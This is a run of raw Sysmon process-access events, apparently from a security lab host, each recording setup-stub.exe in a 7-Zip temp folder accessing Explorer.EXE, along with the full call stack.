13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 